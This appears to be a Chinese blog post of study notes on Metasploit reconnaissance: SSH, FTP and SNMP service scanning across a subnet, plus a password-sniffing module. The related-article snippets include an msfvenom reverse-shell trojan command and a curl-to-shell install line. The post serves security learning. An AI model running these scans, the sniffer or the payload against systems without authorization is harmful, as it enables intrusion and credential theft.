Metasploit Framework学到上火,嘴角起疮,眼睛干涩,牙龈肿痛之SSH服务器扫描

最新推荐文章于 2022-02-22 00:14:22 发布
最新推荐文章于 2022-02-22 00:14:22 发布
阅读量154 收藏
点赞数
分类专栏: Metaspoit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Lonelyhat/article/details/99714844
版权

SSH服务器扫描
ssh协议是经过加密的,比较安全

我们要先查看有哪些主机开放22号端口
先用nmap -v -oX net1.xml ip段
来保存扫描后的文件
在msf中保存net1.xml
import net1.xml
然后在msf中使用serivces -p 22 -c name,port,proto 查看主机
最后使用ssh/ssh_version模块来查看

msf5 > use auxiliary/scanner/ssh/ssh_version 
msf5 auxiliary(scanner/ssh/ssh_version) > set rhosts 10.5.65.0/24
rhosts => 10.5.65.0/24
msf5 auxiliary(scanner/ssh/ssh_version) > set threads 5000
threads => 5000
msf5 auxiliary(scanner/ssh/ssh_version) > run

关于ftp服务扫描
过程和ssh服务一样
ftp的端口是21
调用的模块是ftp/ftp_version

针对SNMP协议的扫描(简单网管协议)
auxiliary/scanner/snmp/snmp_login
                     /snmp_enum


针对密码嗅探
密码嗅探模块:
use auxiliary/sniffer/psnuffle
直接run就可以

梵歆
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Metasploit(学习笔记)
zhaji001
08-07 5162
之前阅读了《Metasploit渗透测试指南》准备更深入了解。 MSF终端命令: (kali 中Tab键自动补全) show exploits   列出框架中的渗透攻击模块 show  payloads  列出框架中攻击载荷 show auxiliary   列出框架中辅助攻击模块 search  name  查找框架中攻击模块 info 显示模块的信息 use name  选择要使...
渗透测试-metasploit-ssh弱口令暴力破解
dongxieaitonglao的博客
03-04 1157
一. ssh: SSH 为 Secure Shell 的缩写,SSH 为建立在应用层基础上的安全协议。SSH 是较可靠,专为远程登录会话和其他网络服务提供安全性的协议。利用 SSH 协议可以有效防止远程管理过程中的信息泄露问题。SSH最初是UNIX系统上的一个程序,后来又迅速扩展到其他操作平台。SSH在正确使用时可弥补网络中的漏洞。 传统的网络服务程序,如:ftp、pop和telnet在本质上都是不安全的,因为它们在网络上用明文传送口令和数据,别有用心的人非常容易就可以截获这些口令和数据。而且,这些服务程序
使用 Metasploit 利用 OpenSSH 用户枚举漏洞 (CVE-2018-15473, CVE-2016-6210, CVE-1999-0502)
还没想好昵称的新建p的博客
02-22 1万+
本文大致讲述了如何使用 Metasploit 利用 OpenSSH 用户枚举漏洞。请务必遵守相关法律。(CC-BY-ND 4.0)
metasploitable2漏洞利用之ssh
u011250160的博客
04-22 1326
端口扫描 信息搜集发现是openssh4.7p1 找来找去也没有什么可以直接获取shell的漏洞 下面这个是枚举ssh用户名的脚本 发现用户名 msf里的模块也可以爆破密码,不过相比之下,速度不如hydra 破解出了ssh的用户名和密码就可以去登录了 在linux下直接命令行去连就行了 在windows下需要一个客户端 我这里用的是XShell 注意这里登录后的权限不是root 提权还不会,就先到这把 ...
metasploit扫描ssh
天元喜羊羊的博客
04-07 3793
[root@localhost app]# msfconsole ______________________________________________________________________________ | | |
白帽黑客与网络安全工程师教你Kali Linux:使用Metasploit进行SSH服务扫描
Kali与编程
09-27 511
本分享仅做学习交流,请自觉遵守法律法规! 搜索:Kali与编程,学习更多网络攻防干货! 下篇文章将在明天下午五点发布,敬请关注! 一、背景介绍 Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的漏洞脚本,从而进行测试。Metasploit(msf)究竟威力如何呢?接下来让我们一起学习! 二、资源装备 1.安装好Kali
Kali linux 学习笔记(九十五)metasploit framework——弱点扫描 2020.4.27
闵行小鱼塘
04-27 864
本节学习用msf弱点扫描
metasploit-framework-6.3.34.zip
最新发布
09-17
Metasploit Framework 6.3.34:渗透测试的利器》 Metasploit Framework,简称MSF,是一款开源的安全漏洞检测工具,主要用于安全研究人员进行渗透测试和漏洞验证。这个版本是6.3.34,代表着软件的最新迭代,通常会...
metasploitframework-latest.msi
09-17
metasploitframework-latest.msi
MASTERING_METASPLOIT_THIRD_EDITION_metasploitframework_
10-02
《Mastering Metasploit Framework》第三版是一本深入探讨Metasploit框架的专业书籍,旨在帮助读者精通这个强大的安全测试工具。Metasploit是一款开源的安全漏洞利用框架,被广泛用于网络安全评估、漏洞验证以及防御...
metasploitframework框架
09-28
metasploit-framework-V6.1.8适用于Windows系统。 Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。
metasploit_in_termux:在Termux中安装Metasploit Framework 6
05-02
Termux中的Metasploit Framework 6 如何: 汽车 source <( curl -fsSL https://kutt.it/msf ) 手动的 pkg install wget wget ...
kali->使用Metaspoit制作木马
热门推荐
底层社会中的弱智
07-28 1万+
首先,我们要先知道木马的使用过程,然后我们才能制作出木马 木马:控制端(我们) 被控制端(倒霉蛋们) 虚拟机的kali 打开终端 使用msfvenom -p命令来制作(因为我用的是kali2.0所以和1.0的版本不一样) msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '0x00' LHOST=192
Kali -> nmap
底层社会中的弱智
08-19 563
主动信息收集 nmap工具 主要主机发现 端口扫描 版本侦测 OS侦测 nmap几个重要的参数 nmap -sn 存活主机 -O 查看操作系统 -sP 在线主机 -sV 端口服务 -A 综合扫描 nmap对于防火墙与IDS的规避 分片 IP诱骗/伪装 指定源端口 扫描延时 其他技术 采用欺骗的方式来进...
Metasploit Framework学到上火,嘴角起疮,眼睛干涩,牙龈肿痛之生成木马
底层社会中的弱智
08-19 403
使用msfvenom生成木马 查看可以支持windows64位的payload msfvenom -l payload | grep x64 msfvenom -p 指定payload -f 输出的格式 -e 是编码器 -c 添加一个win32的shellcode 显示所有payload msfvenm -l payload | more...
Metasploit Framework学到上火,嘴角起疮,眼睛干涩,牙龈肿痛之针对性扫描探测
底层社会中的弱智
08-19 301
针对Mysql版本扫描 use auxiliary/scanner/mysql/mysql_version 实例: msf5 auxiliary(scanner/mysql/mysql_version) > set RHOSTS 10.5.65.100 RHOSTS => 10.5.65.100 msf5 auxiliary(scanner/mysql/mysql_version) ...
Metasploit Framework学到上火,嘴角起疮,眼睛干涩,牙龈肿痛之基本操作
底层社会中的弱智
08-19 223
通过学习msf期间,主要是针对浏览器,操作系统,系统应用之类的漏洞利用,大家要多多留意各大安全平台的最新漏洞提醒,也要学会如何查找对应的漏洞利用。 在我们把postgresql数据库配置完成之后 在kali中输入 msfconsole 进入到工具中 我们查看有哪些攻击载荷 show exploits 如何查看我们所需要的漏洞名 使用 search 漏洞编号 然后就可以...
Metasploit Framework学到上火,嘴角起疮,眼睛干涩,牙龈肿痛之postgresql数据库
底层社会中的弱智
08-18 219
这个软件我之后会简称为MSF,他继承在Kali中。 关于POSTGRESQL数据库 在使用数据库的时候,我们首先要下载数据库 apt-get install postgresql apt-get install pgadmin3 图形化 我们就要打开数据库服务 service postgresql start 数据库初始化 msfdb init 开启和关闭 msfdb st...
Metasploit Framework学到上火,嘴角起疮,眼睛干涩,牙龈肿痛之TCP空闲扫描
底层社会中的弱智
08-19 203
TCP空闲扫描 利用一些僵尸主机的端口 来判断IP ID IP ID是累加的,所以只分析最后一个包就可以 理论过程: 攻击机向僵尸主机发送一个SYN包 僵尸主机会响应给攻击机一个RST包,其中rst包中存在IP ID值,IP ID 值是累加的 然后攻击机向目标服务器发送一个SYN包,SYN中的信息是僵尸主机的 服务器根据SYN包中的信息判断是僵尸主机的地址,响应RST包个给僵尸主机,其中也有一个...
Metasploit Framework 3.0中文开发手册
"Metasploit Framework中文手册" Metasploit Framework是一个开源的安全漏洞利用框架,它允许安全研究人员和渗透测试人员开发、测试和利用各种安全漏洞。本手册详细介绍了如何在Metasploit Framework中进行exploit...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值